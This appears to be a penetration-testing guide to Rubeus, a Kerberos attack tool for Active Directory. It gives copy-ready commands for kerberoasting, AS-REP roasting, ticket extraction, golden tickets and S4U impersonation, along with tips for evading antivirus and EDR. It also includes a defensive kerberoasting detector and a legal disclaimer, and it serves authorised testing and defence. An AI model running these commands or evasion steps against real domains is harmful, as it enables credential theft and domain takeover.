Rubeus — Install, Use, Optimise (2026)

Manish Garg Associate of (ISC)² · RingSafe
Apr 29, 2026

C# tool for raw Kerberos ticket manipulation — kerberoast, AS-REP roast, ticket extraction, golden/silver tickets, S4U abuse.

Use case: Active Directory
Difficulty: Advanced
Homepage: https://github.com/GhostPack/Rubeus

Installation

Pick the install method that matches your stack. The Docker option is the cleanest for one-off scans where you don’t want to pollute your workstation.

Compile from source (Visual Studio)

git clone https://github.com/GhostPack/Rubeus, then open the solution in Visual Studio and build the Release configuration.

Pre-built (use cautiously)

Pre-built binaries are AV-flagged; compile yourself for engagements.

Linux equivalent

Use Impacket (GetUserSPNs, GetNPUsers, etc.) instead.

Core commands

The handful of invocations you’ll actually run on 90% of engagements:

Kerberoast

Rubeus.exe kerberoast /outfile:kerb.txt

AS-REP roast

Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

Triage tickets in memory

Rubeus.exe triage

Extract a TGT

Rubeus.exe dump /service:krbtgt /luid:0x12345 /nowrap

Generate golden ticket

Rubeus.exe golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /rc4:HASH /id:500 /ptt

S4U2Self+S4U2Proxy abuse

Rubeus.exe s4u /user:WS01$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /ptt

Performance optimisation

What separates a junior who runs the default invocation from a practitioner who knows the knobs:

  • Compile with custom string obfuscation (e.g., InvisibilityCloak tool) — defeats string-based AV.
  • /nowrap outputs raw base64 — easier for piping into kekeo or pyKerberos.
  • /luid:0xXXXX targets a specific logon session for credential extraction.
  • /ptt (pass-the-ticket) injects directly into current process memory — no .ccache file written.

Common pitfalls

Real failure modes that bite people on engagements. Most are recoverable; a few are reputation-damaging.

  • EVERY EDR has Rubeus signatures. Direct execution = detection. Use AMSI bypass + reflective loading.
  • kerberoast requires no special privs but generates 4769 events on the DC — SOC visible.
  • Golden tickets require krbtgt hash from DCSync — significant prerequisite.
  • Clock skew >5min between attacker and DC = all Kerberos ops fail.
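
The 4769 events mentioned in the pitfalls above are what a SOC keys on. The following is an added detection example, not code from the original page or from the Rubeus project: it flags a requester that obtains RC4-HMAC (0x17) service tickets for several distinct user-account services within a short window. The sample events, the 5-minute window and the threshold of 4 services are constructed assumptions; the dictionary keys follow the EventData field names of Event ID 4769.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType value for RC4-HMAC in Event ID 4769

def _ev(ts, user, svc, etype, ip, status="0x0"):
    # Keys mirror the EventData field names of Security Event ID 4769.
    return {"TimeCreated": ts, "TargetUserName": user, "ServiceName": svc,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": status}

# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    _ev("2026-04-29T10:00:01", "jdoe@CORP.LOCAL", "svc_sql", "0x17", "10.0.0.50"),
    _ev("2026-04-29T10:00:02", "jdoe@CORP.LOCAL", "svc_web", "0x17", "10.0.0.50"),
    _ev("2026-04-29T10:00:03", "jdoe@CORP.LOCAL", "svc_backup", "0x17", "10.0.0.50"),
    _ev("2026-04-29T10:00:04", "jdoe@CORP.LOCAL", "svc_iis", "0x17", "10.0.0.50"),
    _ev("2026-04-29T10:00:05", "jdoe@CORP.LOCAL", "svc_sharepoint", "0x17", "10.0.0.50"),
    _ev("2026-04-29T10:01:00", "alice@CORP.LOCAL", "svc_web", "0x12", "10.0.0.61"),
    _ev("2026-04-29T10:02:00", "alice@CORP.LOCAL", "svc_sql", "0x17", "10.0.0.61"),
    _ev("2026-04-29T10:03:00", "alice@CORP.LOCAL", "DC01$", "0x12", "10.0.0.61"),
]

def flag_kerberoast(events, window=timedelta(minutes=5), min_services=4):
    """Map (requester, source IP) -> sorted services, for requesters that got
    RC4 tickets for >= min_services distinct user-account services in `window`."""
    by_requester = defaultdict(list)
    for e in events:
        svc = e["ServiceName"]
        if e["Status"] != "0x0":                          # request failed, no ticket issued
            continue
        if svc.endswith("$") or svc.lower() == "krbtgt":  # machine accounts, krbtgt
            continue
        if int(e["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        ts = datetime.fromisoformat(e["TimeCreated"])
        by_requester[(e["TargetUserName"], e["IpAddress"])].append((ts, svc))

    alerts = {}
    for key, hits in by_requester.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:  # slide the window start forward
                start += 1
            distinct = {svc for _, svc in hits[start:end + 1]}
            if len(distinct) >= min_services:
                alerts[key] = sorted(distinct | set(alerts.get(key, [])))
    return alerts

if __name__ == "__main__":
    for (user, ip), services in flag_kerberoast(SAMPLE_EVENTS).items():
        print(f"possible kerberoasting: {user} from {ip} -> {services}")
```

Tune the window and threshold against a baseline of normal ticket requests in your own domain before alerting on the result.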

Modern alternatives in 2026

The ecosystem moves fast. These are tools you should at least be aware of:

  • Impacket (Linux-side) — same operations, different tool.
  • kekeo — Benjamin Delpy’s Kerberos tool, similar capabilities.

India context and engagement notes

Rubeus is the canonical Windows-side AD attack tool in 2026. For Indian banking pen-tests, expect serious EDR (CrowdStrike, SentinelOne) — Rubeus must be obfuscated and reflectively loaded to run. Budget extra hours for tradecraft refinement.


⚖️ Legal: Use only on systems you own or have explicit written authorisation to test. In India, unauthorised access is punishable under Section 66 of the IT Act, 2000 (up to 3 years imprisonment + fine). Pair every engagement with a signed Statement of Work or Rules of Engagement before running anything from this page.
